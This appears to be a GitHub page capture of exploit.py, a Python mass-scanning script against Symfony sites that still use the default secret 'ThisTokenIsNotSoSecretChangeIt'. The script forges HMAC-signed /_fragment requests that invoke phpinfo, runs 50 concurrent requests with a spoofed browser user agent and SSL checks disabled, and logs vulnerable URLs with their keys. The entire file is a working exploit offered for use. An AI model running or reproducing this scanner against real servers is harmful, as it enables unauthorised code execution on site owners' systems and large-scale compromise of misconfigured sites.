-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathexploit.py
93 lines (79 loc) · 3.95 KB
/
exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
import asyncio
import aiohttp
import hmac
import hashlib
import base64
import urllib.parse
import argparse
from tqdm import tqdm
SECRET_KEYS = [
'ThisTokenIsNotSoSecretChangeIt'
]
CONCURRENCY_LIMIT = 50
FIREFOX_USER_AGENT = "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0"
BATCH_SIZE = 1000
def generate_hmac(url, secret):
url_to_hash = f"{url}/_fragment?_path=_controller%3Dphpinfo%26what%3D-1%26return_value%3Dnull"
hashed = hmac.new(secret.encode(), url_to_hash.encode(), hashlib.sha256).digest()
base64_hmac = base64.b64encode(hashed).decode()
encoded_hmac = urllib.parse.quote(base64_hmac).replace("/", "%2F")
return encoded_hmac
async def send_request(session, url, hash_value):
full_url = f"{url}/_fragment?_path=_controller%3Dphpinfo%26what%3D-1%26return_value%3Dnull&_hash={hash_value}"
headers = {
'User-Agent': FIREFOX_USER_AGENT
}
try:
async with session.get(full_url, headers=headers, timeout=4, ssl=False) as response: # Disable SSL verification
response_text = await response.text(encoding='utf-8', errors='ignore')
return response_text
except (aiohttp.ClientConnectorError, aiohttp.ClientOSError, aiohttp.ServerDisconnectedError, aiohttp.TooManyRedirects) as e:
return None
except asyncio.TimeoutError:
return None
except ConnectionResetError:
return None
except Exception as e:
return None
async def process_url(session, semaphore, url, secret, output_file, hashes_file, progress_bar):
async with semaphore:
hash_value = generate_hmac(url, secret)
if hash_value:
response_text = await send_request(session, url, hash_value)
if response_text and 'PHP Version' in response_text:
try:
output_file.write(f"Vulnerable URL: {url} Secret Key: {secret}\n")
output_file.flush()
hashes_file.write(f"{url} Secret Key: {secret}\n")
hashes_file.flush()
print(f"Vulnerable URL: {url} Secret Key: {secret}")
except Exception as e:
pass
progress_bar.update(1)
async def process_batch(session, semaphore, urls_batch, secret_keys, output_file, hashes_file, progress_bar):
tasks = []
for url in urls_batch:
for secret in secret_keys:
task = process_url(session, semaphore, url, secret, output_file, hashes_file, progress_bar)
tasks.append(task)
await asyncio.gather(*tasks)
async def process_urls(input_file_path, output_file_path, secret_keys):
semaphore = asyncio.Semaphore(CONCURRENCY_LIMIT)
async with aiohttp.ClientSession() as session:
with open(input_file_path, 'r', encoding='utf-8', errors='ignore') as input_file:
urls = [line.strip() for line in input_file if line.strip()]
with open(output_file_path, 'w', encoding='utf-8', errors='ignore') as output_file, \
open('hashes.txt', 'w', encoding='utf-8', errors='ignore') as hashes_file:
progress_bar = tqdm(total=len(urls) * len(secret_keys), desc="Processing URLs", unit="URL")
for i in range(0, len(urls), BATCH_SIZE):
urls_batch = urls[i:i + BATCH_SIZE]
await process_batch(session, semaphore, urls_batch, secret_keys, output_file, hashes_file, progress_bar)
progress_bar.close()
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="Find URLs Using Symfony Default Secret Value")
parser.add_argument("input_file", help="Path to the input file containing URLs")
parser.add_argument("output_file", help="Path to the output file")
args = parser.parse_args()
input_file_path = args.input_file
output_file_path = args.output_file
asyncio.run(process_urls(input_file_path, output_file_path, SECRET_KEYS))